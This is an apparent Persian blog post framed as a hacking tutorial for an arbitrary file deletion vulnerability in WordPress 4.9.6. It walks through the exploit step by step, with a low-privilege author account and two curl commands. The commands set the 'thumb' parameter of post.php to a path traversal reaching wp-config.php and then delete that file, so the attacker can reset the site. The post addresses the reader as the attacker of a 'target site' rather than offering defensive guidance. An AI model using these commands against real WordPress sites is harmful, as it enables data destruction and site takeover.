اکسپلویت وردپرس 4.9.6 به منظور حذف فایل

اکسپلویت وردپرس

اکسپلویت وردپرس | معرفی اسیب پذیری جدید وردپرس برای حذف فایل های حساس و ریست وردپرس و همچنین امکان دسترسی های دیگر
در ادامه این پست اموزشی با ما همراه باشید و نحوه استفاده از این اسیب پذیری را بیاموزید

اکسپلویت وردپرس 4.9.6

 

توضیحات درباره وردپرس و اکسپلویت وردپرس

وردپرس یک سیستم مدیرت محتوا بسیار محبوب و پر استفاده در دنیای اینترنت میباشد که این امکان را میدهد در کمتر از 5 دقیقه وبلاگ خود را راه اندازی کنید
به همین دلیل کاربران بسیاری را به سمت خود جذب کرده است و حجم زیادی از سایت های دنیا بر پایه این سیستم مدریت محتوا میباشند
در این پست اموزشی حفره امنیتی جدید وردپرس را معرفی میکنیم و توضیحات کاملی درباره ان خواهیم داد
 

اکسپلویت وردپرس

در نسخه جدید وردپرس ورژن 4.9.6 اسب پذیری مهمی کشف شد و داخل سایت های ثبت اکسپلویت ان را مشاهده میکنیم
این اسیب پذیری این امکان را به نفوذگر میدهد که فایل های درون دایرکتوری سرور را حذف نماید که این میتواند مشکلات بسیاری را رقم بزند
به طور مثال فایل config وردپرس یکی از مهم ترین فایل های ان میباشد که درصورتی که حذف شود
امکان ریست وردپرس به شخص داده میشود و میتوانید سیستم را از نو با پسود جدید راه اندازی کند
اکسپلویت وردپرس step

نحوه استفاده و اموزش هک

این باگ در برگه post.php وردپرس و ورودی thumb که برای ادرس فایل ها میباشد کشف شده است و
پس برای استفاده از اکسپلویت وردپرس به صورت دستی ان باید یک دسترسی سطح پایین داشت مانند نویسنده
در قسمت رسانه ها یک تصویر جدید اپلود میکنیم و در قسمت تغیرات وارد میشویم 
در اینجا وارد لینوکس خود شوید و دقت کنید سرویس curl نصب باشد 
بعد از ان همانند دستور زیر فایل مورد نظر خود را حذف کنید

curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'

ادرس سایت مورد نظر خود را در قسمت site وارد کنید و در اخر هم صحفه مورد نظر مانند Config.php را میتوانید برای حذف انتخاب کنید
حال صفجه مورد نظر انتخاب شده است و برای حذف ان مانند دستور زیر انجام میدهیم

curl -v 'http://site.com/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'

بعد از اجرای دستور بالا اکسپلویت شما با موفقیت عمل میکنید
 

  تشخیص قالب وردپرس

ویدیو اموزشی برای اکسپلویت وردپرس


 
 
 
لینک اکسپلویت اسیب پذیری وردپرس

اکسپلویت


 

0/5 ( 0 نظر )

نیما حسینی هستم بنیان گذار تیم پن تست کور ، مدرس دوره های تست نفوذ و امنیت

مطالب مرتبط

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *